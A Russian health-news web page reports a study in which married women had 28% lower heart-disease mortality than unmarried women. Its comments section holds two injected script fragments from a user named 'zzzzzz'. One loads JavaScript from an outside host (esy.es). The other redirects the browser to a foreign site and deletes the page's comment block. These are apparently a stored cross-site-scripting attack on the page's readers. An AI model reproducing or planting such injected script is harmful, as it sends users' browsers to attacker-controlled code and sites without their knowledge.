Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Женщины! Мужчины спасут в...  >>  Женщины! Мужчины спасут вас от инфаркта, но есть нюанс…
 
Обратная связь
 

Женщины! Мужчины спасут вас от инфаркта, но есть нюанс…

Размер шрифта
13 октября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Теперь у женщин появился еще один повод хотеть поскорее выйти замуж. Как оказалось, брак положительно влияет на их здоровье – снижает риск умереть от заболеваний сердца.

Женщины! Мужчины спасут вас от инфаркта, но есть нюанс…

Недавнее исследование показало, что замужние женщины имеют на 28% меньшую вероятность умереть от заболеваний сердца по сравнению с незамужними. И это несмотря на то, что само замужество никак не влияет на риск развития у женщины сердечных заболеваний.

Причины такой разницы в смертности пока остаются неизвестными. Однако доктор Сара Флойд с коллегами из группы изучения рака Оксфордского Университета считают, что возможное объяснение этому – тот факт, что мужья замужних женщин уговаривают их раньше обратиться к врачу по поводу возникающих симптомов. Ученые также признают, что может существовать множество других объяснений. К примеру, недавние работы показали, что мужья следят за тем, чтобы их супруги вовремя принимали лекарства, а также влияют на изменение их образа жизни к лучшему. 

В исследование, опубликованное в журнале BMC Medicine, было включено 730 000 женщин, средний возраст которых составил 60 лет. За девять лет наблюдения у 30 000 женщин развились различные заболевания сердца, которые привели к смерти 2 000 из них. Ученые выяснили, что замужние женщины, а также женщины, живущие в гражданском браке, имеют такой же риск развития заболеваний сердца, как и незамужние (в эту группу были включены одинокие женщины, разведенные, а также вдовы). Но шансы умереть от заболеваний сердца у незамужних были на 28% выше.

В работе были проанализированы многие факторы, которые могли повлиять на результат, такие как возраст, социально-экономический статус и образ жизни, но причины более низкой смертности от сердечных заболеваний так и не были выяснены. Доктор Флойд подводит итог своей работы: «Замужние женщины имеют такую же вероятность развития у них заболеваний сердца, как и незамужние, однако гораздо реже погибают от них».

Так что теперь приятное можно совместить с полезным – брак, пусть даже и гражданский, обеспечит вам не только семейное счастье, но и долголетие.

О других способах сохранения этих высших ценностей читайте на страницах нашего специального проекта «Женское здоровье».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:27

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Бегом на улицу! Солнце понижает давление!   Собака спасет от инфаркта! Какую породу завести, чтобы не умереть   В какой день нельзя идти в больницу!   У вас больное сердце! Нет? А если нагнуться?  
22 июня 2013Грецкие орехи спасут от инфаркта 20 июня 2013Собака спасет от инфаркта! Какую породу завести, чтобы не умереть
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом!
 

Слайдшоу

1
Проблемы, с которыми справится секс. Часть 3
Почему женщины так устают?
Не ругайтесь на мужа – он продлевает вам жизнь

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Грозит ли вам инфаркт миокарда?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.